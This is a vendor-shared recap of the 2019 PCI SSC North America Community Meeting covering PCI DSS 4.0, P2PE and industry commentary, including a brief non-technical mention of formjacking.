With the PCI Security Standards Council Europe Community Meeting just a few weeks away, check out this great recap of the PCI DSS 4.0 highlights from September’s PCI North American Meeting in The Green Sheet, with commentary by our Chief Strategy Officer, Ruston Miles, and leaders from ControlScan and SecurityMetrics
The PCI Security Standards Council’s annual North America Community Meeting, held Sept. 17 to 19, 2019, in Vancouver, B.C., drew more than 1,300 attendees. Top agenda items included upcoming releases of the PCI Standard for contactless payments on commercial off-the-shelf (COTS) mobile devices and PCI Data Security Standard Version 4.0 (PCI DSS 4.0).
In addition to continually updating security standards, the PCI SSC is promoting interaction and innovation among payments industry stakeholders, noted Troy Leach, chief technology officer. Recent efforts discussed at the meeting include a Request for Comment (RFC) process, currently employed in the PCI Data Security Security Standard Version 4.0 Request for Comments initiative; the PCI Software Security Framework, which supports agile innovation within approved process guidelines; and the P2PE Standard and Program.
“At last year’s community meeting, these new engagement models were still being designed and we had just created the framework for new areas of engagement,” Leach said. “Seeing the fruits of their labor has energized the industry.” He expects the newly implemented RFC process to improve collaboration when developing next-generation security standards for “a quickly changing world of payments.”
PCI DSS 4.0
Participating members and attendees praised PCI DSS 4.0 and the Council’s renewed focus on collaboration.
Ruston Miles, chief strategy officer, executive vice president and founder at Bluefin, said PCI DSS 4.0 will be easier to understand and implement and “a significant upgrade to the standard in terms of usability and user experience.” Miles was also pleased that P2PE is a top-of-mind topic and becoming widely adopted at a growing pace. Reworking existing standards and organizational structures will improve the user experience, he added.
Marc Punzirudu, vice president, security consulting services at ControlScan, said, “PCI 4.0 will give entities that have established security programs the ability to perform alternative validation of controls.” This significantly improves the standard by replacing compensating controls with objective-based control tests, he stated.
“I’m also personally energized about the Small Merchant Taskforce I’m a part of, because we will be reviewing and commenting on the PCI 4.0 SAQs as they start getting developed,” added Chris Bucolo, vice president of market strategy at ControlScan. “In doing so, we have the opportunity to consolidate and streamline concepts where possible.”
Jen Stone, senior security analyst at SecurityMetrics, presented on formjacking, a cybercrime that intercepts web pages and payment forms. Malicious JavaScript code collects payment card numbers and other personally identifiable information and sends data to another location of the attackers’ choosing, she explained.
“A great part of collaborating with the Council is being able to talk about these trends,” she said. “Half a dozen security analysts came up after the presentation and said, ‘that was a great piece.’”
For further details, please visit www.pcisecuritystandards.org.